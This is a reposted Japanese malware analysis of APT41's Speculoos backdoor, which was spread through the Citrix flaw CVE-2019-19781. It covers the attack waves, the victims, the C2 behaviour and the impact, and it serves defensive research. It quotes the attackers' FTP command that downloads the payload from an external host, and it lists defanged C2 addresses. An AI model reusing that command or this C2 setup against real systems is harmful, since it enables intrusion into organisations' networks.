APT41 Speculoos バックドア分析を実行する方法

PHPz
リリース: 2023-06-02 22:29:33
転載
1145 人が閲覧しました

FireEye は、2020 年 3 月 25 日に、APT41 の世界的な攻撃活動に関するレポートをリリースしました。この攻撃キャンペーンは 1 月 20 日から 3 月 11 日まで発生し、主に Citrix、Cisco、Zoho のネットワーク機器を標的としていました。研究者らは、WildFireとAutoFocusのデータに基づいてCitrixデバイスを標的とした攻撃サンプル「Speculoos」を入手し、北米、南米、欧州を含む世界中の複数の業界で被害者を特定した。

如何进行APT41 Speculoos后门分析

Speculoos は FreeBSD に基づいて実装されています。合計 5 つのサンプルが特定されました。すべてのサンプルのファイル サイズは基本的に同じですが、サンプル間には若干の違いがあります。サンプルセット。 Speculoos は攻撃の伝播に CVE-2019-19781 を悪用します。CVE-2019-19781 は Citrix Application Delivery Controller、Citrix Gateway、および Citrix SD-WAN WANOP に影響を及ぼし、攻撃者が任意のコマンドをリモートで実行できるようにします。

攻撃の詳細

攻撃者は CVE-2019-19781 を悪用して次のコマンドをリモートで実行しました: '/usr/bin/ftp -o /tmp/bsd ftp://test: [編集済み ]\@ 66.42.98[.]220/'。

攻撃の第一波は、2020 年 1 月 31 日の夜に始まり、bsd という名前のファイルを使用し、米国の複数の高等教育機関、米国の医療機関、アイルランドのコンサルティング会社に影響を与えました。攻撃の第 2 波は、ファイル名 un を使用して 2020 年 2 月 24 日に始まり、コロンビアの高等教育機関、オーストリアの製造組織、米国の高等教育機関、米国の州政府に影響を与えました。

BSD システムに基づくマルウェアは比較的まれですが、このツールは特定の Citrix ネットワーク デバイスに関連しているため、Speculoos はこの攻撃活動専用に APT41 組織によって開発される可能性があります。

バイナリ分析

GCC 4.2.1 でコンパイルされた ELF 実行可能ファイルの Speculoos バックドアは、FreeBSD システム上で実行できます。ペイロードはターゲットに対する永続的な制御を維持できないため、攻撃者は追加のコンポーネントまたは他の攻撃方法を使用して制御を維持します。バックドアの実行後、ループが開始され、ポート 443 を介して C2 ドメインと通信し、関数

##alibaba.zzux[.]com (119.28.139[.]120) を呼び出します。 )


#通信に問題がある場合、Speculoos はポート 443 (IP アドレス 119.28.139[.]20) を介してバックアップ C2 サーバーに接続しようとします。 C2 サーバーに接続すると、サーバーとの TLS ハンドシェイクが実行されます。図 1 は、C2 サーバーに送信されるパケットを示しています。


如何进行APT41 Speculoos后门分析サーバー名表示 (SNI) として、login.live[.]com を要求します。


如何进行APT41 Speculoos后门分析C2 への接続に成功し、TLS ハンドシェイクが完了すると、Speculoos はターゲット システムのフィンガープリントを取得し、データを C2 サーバーに送り返します。その構造を以下の表 1 に示します。


如何进行APT41 Speculoos后门分析データは TLS チャネル経由で送信され、Speculoos はサーバーからの 2 バイトの応答を待ちます。応答を受信した後、バイト (0xa) を C2 に送信し、コマンドを待つループに入ります。表 2 は、攻撃者が実行できるコマンドを示しており、攻撃者が被害者のシステムを完全に制御できるようになります。


如何进行APT41 Speculoos后门分析 研究で分析された 2 つの Speculoos サンプルは機能的に同一であり、システム情報を収集する際の「ホスト名」の違いは 8 バイトのみです。 「uname -s」コマンド。 uname -s はカーネル情報を返し、hostname はホスト システム名を返します。以下の画像は、2 つの Speculoos サンプル間のバイナリ比較を示しています。


如何进行APT41 Speculoos后门分析影響評価

権限のないユーザーがリモートからコードを実行できるようにするインターネットにアクセス可能なデバイスは、重大なセキュリティ上の問題を引き起こします。CVE-2019-19781 は影響を及ぼします。攻撃者はこの脆弱性を積極的に悪用してカスタム バックドアをインストールします。影響を受けるすべての組織のネットワーク アクティビティはこれらのネットワーク デバイスを通過する必要があるため、攻撃者は組織全体のネットワーク アクティビティを監視または変更する可能性があります。


デフォルトでは、これらのデバイスは組織のシステムに直接アクセスできるため、攻撃者は内部ネットワーク内の横方向の移動の問題を考慮する必要がありません。サイバー攻撃者は、ネットワーク データの改ざん、悪意のあるコードの挿入、中間者攻撃の実行、ユーザーを偽のログイン ページに誘導してログイン情報を盗むなど、さまざまな攻撃手段を使用します。

以上がAPT41 Speculoos バックドア分析を実行する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート